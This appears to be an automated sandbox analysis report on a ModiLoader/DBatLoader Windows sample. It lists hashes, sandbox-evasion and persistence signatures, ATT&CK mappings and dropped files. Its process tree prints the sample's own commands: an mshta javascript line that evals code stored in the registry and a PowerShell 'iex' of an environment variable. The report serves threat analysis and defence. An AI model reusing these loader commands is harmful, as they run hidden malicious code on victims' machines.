Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    31-05-2024 03:13

General

  • Target

    74bcda5c9a93045fe2417b8f021e5320_NeikiAnalytics.exe

  • Size

    298KB

  • MD5

    74bcda5c9a93045fe2417b8f021e5320

  • SHA1

    8a2c668bdb42ee9da855c1097f76d991d567e813

  • SHA256

    5c7cf85d5f923da3ecf3699ca8a217ce41ed217bc26294ecadeb53199375f596

  • SHA512

    45081a2661945c4942dec978dc0c5ad242f9b762c173391ec9817296f410028e6fd8fff66f24440aa277bea12b37837785f54ed42b674dbd148b9addfeb48918

  • SSDEEP

    6144:MqaFH+9xuBumDpw4K0q8+xgPcOCDbsv/27YcMClQy1lkYa/KVKugxCundcmSNKn:k54uBf5YgcOC/sv/EYYxH9gCudFSNKn

Malware Config

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
  • Looks for VirtualBox drivers on disk 2 TTPs 1 IoCs
  • ModiLoader Second Stage 56 IoCs
  • Looks for VMWare Tools registry key 2 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Deletes itself 1 IoCs
  • Drops startup file 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies registry class 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 25 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\74bcda5c9a93045fe2417b8f021e5320_NeikiAnalytics.exe
    "C:\Users\Admin\AppData\Local\Temp\74bcda5c9a93045fe2417b8f021e5320_NeikiAnalytics.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of SetThreadContext
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of WriteProcessMemory
    PID:2164
    • C:\Users\Admin\AppData\Local\Temp\74bcda5c9a93045fe2417b8f021e5320_NeikiAnalytics.exe
      "C:\Users\Admin\AppData\Local\Temp\74bcda5c9a93045fe2417b8f021e5320_NeikiAnalytics.exe"
      2⤵
        PID:2548
    • C:\Windows\system32\mshta.exe
      "C:\Windows\system32\mshta.exe" javascript:rGO6JWjm="wFDCxXl";TO30=new%20ActiveXObject("WScript.Shell");F4BamqA="ICrw";L8lYy=TO30.RegRead("HKCU\\software\\ZiT0VXKl\\zobVnss");N7VSN="Y";eval(L8lYy);zJ4MzuUb="FSfqdaR";
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:2568
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:qwwm
        2⤵
        • Drops file in System32 directory
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2412
        • C:\Windows\SysWOW64\regsvr32.exe
          regsvr32.exe
          3⤵
          • Looks for VirtualBox Guest Additions in registry
          • Looks for VirtualBox drivers on disk
          • Looks for VMWare Tools registry key
          • Checks BIOS information in registry
          • Deletes itself
          • Drops startup file
          • Adds Run key to start application
          • Maps connected drives based on registry
          • Suspicious use of SetThreadContext
          • Modifies Internet Explorer settings
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of WriteProcessMemory
          PID:2584
          • C:\Windows\SysWOW64\regsvr32.exe
            "C:\Windows\SysWOW64\regsvr32.exe"
            4⤵
              PID:2272

      Network

      MITRE ATT&CK Matrix ATT&CK v13

      Persistence

      Boot or Logon Autostart Execution

      1
      T1547

      Registry Run Keys / Startup Folder

      1
      T1547.001

      Privilege Escalation

      Boot or Logon Autostart Execution

      1
      T1547

      Registry Run Keys / Startup Folder

      1
      T1547.001

      Defense Evasion

      Virtualization/Sandbox Evasion

      3
      T1497

      Modify Registry

      2
      T1112

      Discovery

      Software Discovery

      1
      T1518

      Query Registry

      4
      T1012

      Virtualization/Sandbox Evasion

      3
      T1497

      File and Directory Discovery

      1
      T1083

      System Information Discovery

      3
      T1082

      Peripheral Device Discovery

      1
      T1120

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
        Filesize

        70KB

        MD5

        49aebf8cbd62d92ac215b2923fb1b9f5

        SHA1

        1723be06719828dda65ad804298d0431f6aff976

        SHA256

        b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

        SHA512

        bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

      • C:\Users\Admin\AppData\Local\Temp\TarE99B.tmp
        Filesize

        181KB

        MD5

        4ea6026cf93ec6338144661bf1202cd1

        SHA1

        a1dec9044f750ad887935a01430bf49322fbdcb7

        SHA256

        8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

        SHA512

        6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

      • C:\Users\Admin\AppData\Local\d3afae0\52d5d4d.73caeeca
        Filesize

        33KB

        MD5

        04ed860cb3a3d17f1895430ad1f54bc5

        SHA1

        f97a9c652a8b36fd7b8cd666a740d35576ddac7c

        SHA256

        979f7d4c407e3f095ada222ace6f5887e3a2f532163dd23f5fd3b7fee3acfe0c

        SHA512

        6aa392275483e052206c6a6dd329a9a097823f0896d26dee7ff380b4e1d30532f204002742d3fc3c377741aba067fc4004cbe28d7e35b805aed56119e4354141

      • C:\Users\Admin\AppData\Local\d3afae0\9a86c6c.lnk
        Filesize

        885B

        MD5

        870fd90f2895136713eab34ae2ca3531

        SHA1

        031daaa2f325904aefe86c7ea65fb43c1ad959cf

        SHA256

        eaa2c5995815905dc754f4fab59ae6b71aaada799e64b4a81d119ca345afe7d3

        SHA512

        881445aebdbb995d623a482610ba7f63dca171a685a8fb5921be37ace6e8644332bae060548cb84cb9294501c7e8c3aa8e79fd8ac0569f01fd488b1abb91fdfe

      • C:\Users\Admin\AppData\Local\d3afae0\d223967.bat
        Filesize

        64B

        MD5

        a1292215dc2981da04d82ff4e3a1599c

        SHA1

        27a54900f2735f7158afb15c76d569cae442b459

        SHA256

        9a8bc95d22a7abce5ed7b3d21c41fa1a6bcacff86c95127f207c9a8570be5b0b

        SHA512

        43bf866e2c0c5578fc8b05901aaaacabaec819615a64c5252813ecfe6c12edad77ac6c2dbf85871baa72cb593456e1baa80bfbaa10f146cd000d661d5ce45023

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\e795bdc.lnk
        Filesize

        993B

        MD5

        858d3837ecdbc3987a30ab4afc15ec4d

        SHA1

        bdf7ae103a2131390bf0a5b1ee8f35d04c28f6aa

        SHA256

        34537b56a78b8e385e931f0378559e84249bb62e428c29d26abcddcb82bfd4e7

        SHA512

        87549309a08450710314a9cab5d23590681339b9ad86947e584374e8a46c969412f2aa6fcc5e26d13b0b0a70d8d5b9ddb40725f7dd5f1555c55b63446b689ff9

      • C:\Users\Admin\AppData\Roaming\e00a3ef\fe73a48.73caeeca
        Filesize

        46KB

        MD5

        cf44264a5a9f3a915983d7f8d37b8a99

        SHA1

        389b857040bcea336428132826d2cdbd0e4d9eb2

        SHA256

        1eff7fdd9c5db23edb10604603bfce7a552a3d1636cbc7faac195ade57b6d1b7

        SHA512

        20eec7005a059d87d5fc03d8c40be667f35377c99880471f848bcd1e3693c8744a601cd93e93189e56f5aae9e250b261b4669b149298b3b66df2898750638ddd

      • \Users\Admin\AppData\Local\Temp\nsi2369.tmp\System.dll
        Filesize

        11KB

        MD5

        ee260c45e97b62a5e42f17460d406068

        SHA1

        df35f6300a03c4d3d3bd69752574426296b78695

        SHA256

        e94a1f7bcd7e0d532b660d0af468eb3321536c3efdca265e61f9ec174b1aef27

        SHA512

        a98f350d17c9057f33e5847462a87d59cbf2aaeda7f6299b0d49bb455e484ce4660c12d2eb8c4a0d21df523e729222bbd6c820bf25b081bc7478152515b414b3

      • memory/2164-16-0x00000000003D0000-0x00000000003D3000-memory.dmp
        Filesize

        12KB

      • memory/2164-21-0x00000000003D0000-0x00000000003D3000-memory.dmp
        Filesize

        12KB

      • memory/2272-78-0x00000000001B0000-0x00000000002F4000-memory.dmp
        Filesize

        1.3MB

      • memory/2272-83-0x00000000001B0000-0x00000000002F4000-memory.dmp
        Filesize

        1.3MB

      • memory/2272-88-0x00000000001B0000-0x00000000002F4000-memory.dmp
        Filesize

        1.3MB

      • memory/2272-87-0x00000000001B0000-0x00000000002F4000-memory.dmp
        Filesize

        1.3MB

      • memory/2272-86-0x00000000001B0000-0x00000000002F4000-memory.dmp
        Filesize

        1.3MB

      • memory/2272-85-0x00000000001B0000-0x00000000002F4000-memory.dmp
        Filesize

        1.3MB

      • memory/2272-84-0x00000000001B0000-0x00000000002F4000-memory.dmp
        Filesize

        1.3MB

      • memory/2272-82-0x00000000001B0000-0x00000000002F4000-memory.dmp
        Filesize

        1.3MB

      • memory/2272-81-0x00000000001B0000-0x00000000002F4000-memory.dmp
        Filesize

        1.3MB

      • memory/2272-80-0x00000000001B0000-0x00000000002F4000-memory.dmp
        Filesize

        1.3MB

      • memory/2272-79-0x00000000001B0000-0x00000000002F4000-memory.dmp
        Filesize

        1.3MB

      • memory/2272-77-0x00000000001B0000-0x00000000002F4000-memory.dmp
        Filesize

        1.3MB

      • memory/2412-40-0x00000000060A0000-0x0000000006178000-memory.dmp
        Filesize

        864KB

      • memory/2412-36-0x00000000060A0000-0x0000000006178000-memory.dmp
        Filesize

        864KB

      • memory/2548-27-0x0000000001D90000-0x0000000001E68000-memory.dmp
        Filesize

        864KB

      • memory/2548-22-0x0000000000400000-0x000000000043B000-memory.dmp
        Filesize

        236KB

      • memory/2548-23-0x0000000001D90000-0x0000000001E68000-memory.dmp
        Filesize

        864KB

      • memory/2548-24-0x0000000001D90000-0x0000000001E68000-memory.dmp
        Filesize

        864KB

      • memory/2548-18-0x0000000000400000-0x000000000043B000-memory.dmp
        Filesize

        236KB

      • memory/2548-28-0x0000000001D90000-0x0000000001E68000-memory.dmp
        Filesize

        864KB

      • memory/2548-26-0x0000000001D90000-0x0000000001E68000-memory.dmp
        Filesize

        864KB

      • memory/2548-25-0x0000000001D90000-0x0000000001E68000-memory.dmp
        Filesize

        864KB

      • memory/2548-70-0x0000000001D90000-0x0000000001E68000-memory.dmp
        Filesize

        864KB

      • memory/2548-20-0x0000000000400000-0x000000000043B000-memory.dmp
        Filesize

        236KB

      • memory/2548-29-0x0000000001D90000-0x0000000001E68000-memory.dmp
        Filesize

        864KB

      • memory/2584-37-0x0000000000180000-0x00000000002C4000-memory.dmp
        Filesize

        1.3MB

      • memory/2584-65-0x0000000000180000-0x00000000002C4000-memory.dmp
        Filesize

        1.3MB

      • memory/2584-63-0x0000000000180000-0x00000000002C4000-memory.dmp
        Filesize

        1.3MB

      • memory/2584-62-0x0000000000180000-0x00000000002C4000-memory.dmp
        Filesize

        1.3MB

      • memory/2584-66-0x0000000000180000-0x00000000002C4000-memory.dmp
        Filesize

        1.3MB

      • memory/2584-61-0x0000000000180000-0x00000000002C4000-memory.dmp
        Filesize

        1.3MB

      • memory/2584-60-0x0000000000180000-0x00000000002C4000-memory.dmp
        Filesize

        1.3MB

      • memory/2584-59-0x0000000000180000-0x00000000002C4000-memory.dmp
        Filesize

        1.3MB

      • memory/2584-58-0x0000000000180000-0x00000000002C4000-memory.dmp
        Filesize

        1.3MB

      • memory/2584-57-0x0000000000180000-0x00000000002C4000-memory.dmp
        Filesize

        1.3MB

      • memory/2584-56-0x0000000000180000-0x00000000002C4000-memory.dmp
        Filesize

        1.3MB

      • memory/2584-55-0x0000000000180000-0x00000000002C4000-memory.dmp
        Filesize

        1.3MB

      • memory/2584-67-0x0000000000180000-0x00000000002C4000-memory.dmp
        Filesize

        1.3MB

      • memory/2584-68-0x0000000000180000-0x00000000002C4000-memory.dmp
        Filesize

        1.3MB

      • memory/2584-69-0x0000000000180000-0x00000000002C4000-memory.dmp
        Filesize

        1.3MB

      • memory/2584-64-0x0000000000180000-0x00000000002C4000-memory.dmp
        Filesize

        1.3MB

      • memory/2584-44-0x0000000000180000-0x00000000002C4000-memory.dmp
        Filesize

        1.3MB

      • memory/2584-45-0x0000000000180000-0x00000000002C4000-memory.dmp
        Filesize

        1.3MB

      • memory/2584-46-0x0000000000180000-0x00000000002C4000-memory.dmp
        Filesize

        1.3MB

      • memory/2584-54-0x0000000000180000-0x00000000002C4000-memory.dmp
        Filesize

        1.3MB

      • memory/2584-47-0x0000000000180000-0x00000000002C4000-memory.dmp
        Filesize

        1.3MB

      • memory/2584-48-0x0000000000180000-0x00000000002C4000-memory.dmp
        Filesize

        1.3MB

      • memory/2584-49-0x0000000000180000-0x00000000002C4000-memory.dmp
        Filesize

        1.3MB

      • memory/2584-50-0x0000000000180000-0x00000000002C4000-memory.dmp
        Filesize

        1.3MB

      • memory/2584-51-0x0000000000180000-0x00000000002C4000-memory.dmp
        Filesize

        1.3MB

      • memory/2584-52-0x0000000000180000-0x00000000002C4000-memory.dmp
        Filesize

        1.3MB

      • memory/2584-53-0x0000000000180000-0x00000000002C4000-memory.dmp
        Filesize

        1.3MB

      • memory/2584-43-0x0000000000180000-0x00000000002C4000-memory.dmp
        Filesize

        1.3MB

      • memory/2584-42-0x0000000000180000-0x00000000002C4000-memory.dmp
        Filesize

        1.3MB

      • memory/2584-41-0x0000000000180000-0x00000000002C4000-memory.dmp
        Filesize

        1.3MB

      • memory/2584-39-0x0000000000180000-0x00000000002C4000-memory.dmp
        Filesize

        1.3MB